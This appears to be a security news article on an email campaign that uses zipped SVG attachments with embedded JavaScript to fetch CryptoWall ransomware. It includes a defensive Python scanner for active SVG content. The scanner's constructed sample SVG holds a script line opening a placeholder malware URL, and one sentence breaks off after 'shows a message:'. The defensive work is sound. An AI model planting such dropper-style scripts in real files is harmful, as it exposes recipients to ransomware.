SVG (Scalable Vector Graphics), the XML-based vector image format for two-dimensional graphics with support for interactivity and animation, is now being used to deliver malware that encrypts your files and holds them for ransom.
Researchers at AppRiver have identified a malicious email campaign with zipped SVG files attached to the messages. These SVG files contain a malicious JavaScript entry that opens a webpage to download malware.
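As an added example (not code from AppRiver's post), the following scanner parses an SVG as XML and reports the active-content features that let an image file behave like a downloader: script elements, on* event-handler attributes, javascript: links, foreignObject, and hyperlinks to remote hosts. The sample SVGs and the URL in them are constructed placeholders, not artifacts from the campaign.

```python
# Added defensive triage example: flag the active-content features of an SVG file.
# Sample documents below are constructed for the demo; the URL is a placeholder.
import xml.etree.ElementTree as ET
from urllib.parse import urlparse


def _local(tag: str) -> str:
    """Strip the XML namespace from an element or attribute name."""
    return tag.rsplit("}", 1)[-1].lower()


def scan_svg(data: bytes) -> list:
    """Return a list of (finding, detail) tuples for one SVG document."""
    findings = []
    root = ET.fromstring(data)  # stdlib ET does not expand external entities
    for elem in root.iter():
        name = _local(elem.tag)
        if name == "script":
            findings.append(("script-element", (elem.text or "").strip()[:60]))
        if name == "foreignobject":
            findings.append(("foreignObject", "embeds non-SVG content such as HTML"))
        for attr, value in elem.attrib.items():
            aname = _local(attr)
            if aname.startswith("on"):  # onload, onclick, ... event handlers
                findings.append(("event-handler", f"{aname}={value[:60]}"))
            if aname == "href":  # covers both href and xlink:href
                url = value.strip()
                scheme = urlparse(url).scheme.lower()
                if scheme == "javascript":
                    findings.append(("javascript-url", url[:60]))
                elif scheme in ("http", "https", "ftp"):
                    findings.append(("remote-href", url[:60]))
    return findings


def is_suspicious(data: bytes) -> bool:
    """True when any active-content feature is present; a plain drawing returns False."""
    return bool(scan_svg(data))


# Constructed samples: a benign drawing and one carrying a script entry that opens a page.
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="10"/></svg>'
DROPPER_STYLE_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" onload="init()">'
                     b'<script>window.open("http://malware.example.invalid/x.php")</script>'
                     b'<a href="javascript:init()"><rect width="5" height="5"/></a></svg>')

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("dropper-style", DROPPER_STYLE_SVG)):
        print(label, scan_svg(doc))
```

In a mail gateway this check would run on each SVG extracted from the attached zip, quarantining anything that returns findings.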
After analyzing the malicious SVG files, the researchers identified the payload: “CryptoWall”. Upon infection, it encrypts the files and then shows a message:
The downloaded file contained hard-coded SQL commands related to a potential schools database, Jonathan French said in a blog post.
“Some of the recipients we stopped this malware for were schools, but nothing seemed out of the ordinary with the volume of recipients, which was low volume in general,” he added.
Hidden Intentions
“While it’s possible the malware had other intentions from encrypting in mind, like to wreak havoc in a SQL database, this was from a strings output so it was all plain text and the table naming conventions just seem a little too plain as well. However, someone knowing SQL table names or a school using a plain naming convention could be problematic if the malware were to attempt to attain access and do its thing. It’s certainly also a tactic for malware authors to add in code that isn’t used or code that fluffs up functions to distract from analysis and make analyzing more complex and time consuming,” the researcher explains.